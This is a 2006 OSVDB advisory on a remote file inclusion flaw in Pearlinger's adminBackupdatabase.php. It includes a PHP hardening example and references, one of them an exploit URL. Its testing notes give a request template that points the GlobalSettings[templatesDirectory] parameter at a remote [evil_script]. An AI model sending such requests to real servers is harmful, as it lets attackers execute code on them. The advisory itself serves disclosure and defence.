Pearlinger Multiple Product adminBackupdatabase.php GlobalSettings[templatesDirectory] Variable Remote File Inclusion

2006-06-27T07:04:08
ID OSVDB:27173
Type osvdb
Reporter zero(xzerox@linuxmail.org), Kw3rLn(kw3rln@hotmail.com)
Modified 2006-06-27T07:04:08

Description

Vulnerability Description

Multiple Pearlinger.com products contain a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the includes/adminBackupdatabase.php script not properly sanitizing user input supplied to the 'GlobalSettings[templatesDirectory]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

Multiple Pearlinger.com products contain a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the includes/adminBackupdatabase.php script not properly sanitizing user input supplied to the 'GlobalSettings[templatesDirectory]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/includes/adminBackupdatabase.php?GlobalSettings[templatesDirectory]=[evil_script]
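The request pattern above works only because register_globals turns the query-string array into `$GlobalSettings` before the script reads it. As an added illustration (not code from the Pearlinger products, whose source is not reproduced here), the following PHP shows the hypothetical include pattern behind this bug class next to a hardened version; the function `resolveTemplatesDirectory`, the `templates` directory and the `backup.tpl` file name are assumptions for the example.

```php
<?php
// Added example, not the vendor's code. Only the variable name
// GlobalSettings[templatesDirectory] comes from the advisory; the include
// pattern is a hypothetical reconstruction of the bug class.

// VULNERABLE PATTERN: with register_globals=On, a request such as
// ?GlobalSettings[templatesDirectory]=http://... creates $GlobalSettings
// before this line runs, so the include path is attacker-controlled.
// include $GlobalSettings['templatesDirectory'] . '/backup.tpl';

// Refuse to run at all on a misconfigured interpreter; the advisory notes
// register_globals has been off by default since PHP 4.2.0.
if (ini_get('register_globals')) {
    die('register_globals must be Off');
}

// HARDENED PATTERN: confine the setting to a local directory under $baseDir.
function resolveTemplatesDirectory(array $GlobalSettings, string $baseDir): string
{
    $dir = $GlobalSettings['templatesDirectory'] ?? '';
    // Reject anything carrying a scheme or stream wrapper (http://, ftp://, php://, data:).
    if ($dir === '' || preg_match('#^[a-z][a-z0-9+.\-]*:#i', $dir)) {
        throw new RuntimeException('templatesDirectory must be a local path');
    }
    // Canonicalise both paths so ../ sequences and symlinks are resolved.
    $real = realpath($dir);
    $base = realpath($baseDir);
    if ($real === false || $base === false) {
        throw new RuntimeException('templatesDirectory does not exist');
    }
    // The resolved directory must be $baseDir itself or live beneath it.
    $inside = ($real === $base) || strpos($real, $base . DIRECTORY_SEPARATOR) === 0;
    if (!$inside) {
        throw new RuntimeException('templatesDirectory outside allowed base');
    }
    return $real;
}

// Trusted configuration: (re)initialise the array explicitly so any value a
// request injected via register_globals is discarded before it is used.
$GlobalSettings = ['templatesDirectory' => __DIR__ . '/templates'];
$templatesDir = resolveTemplatesDirectory($GlobalSettings, __DIR__);
include $templatesDir . '/backup.tpl';
```

Independently of the application code, turning off register_globals and allow_url_fopen (and, from PHP 5.2.0, allow_url_include) in php.ini removes the remote-include path for every script on the server.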

References:

Vendor URL: http://pearlforums.sourceforge.net/
Secunia Advisory ID: 20819
Related OSVDB ID: 27169
Related OSVDB ID: 27179
Related OSVDB ID: 27176
Related OSVDB ID: 27178
Related OSVDB ID: 27204
Related OSVDB ID: 27171
Related OSVDB ID: 27177
Related OSVDB ID: 27168
Related OSVDB ID: 27170
Related OSVDB ID: 27172
Related OSVDB ID: 27174
Related OSVDB ID: 27175
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0026.html
Generic Exploit URL: http://milw0rm.com/exploits/1956
FrSIRT Advisory: ADV-2006-2561
CVE ID: CVE-2006-3340
Bugtraq ID: 18690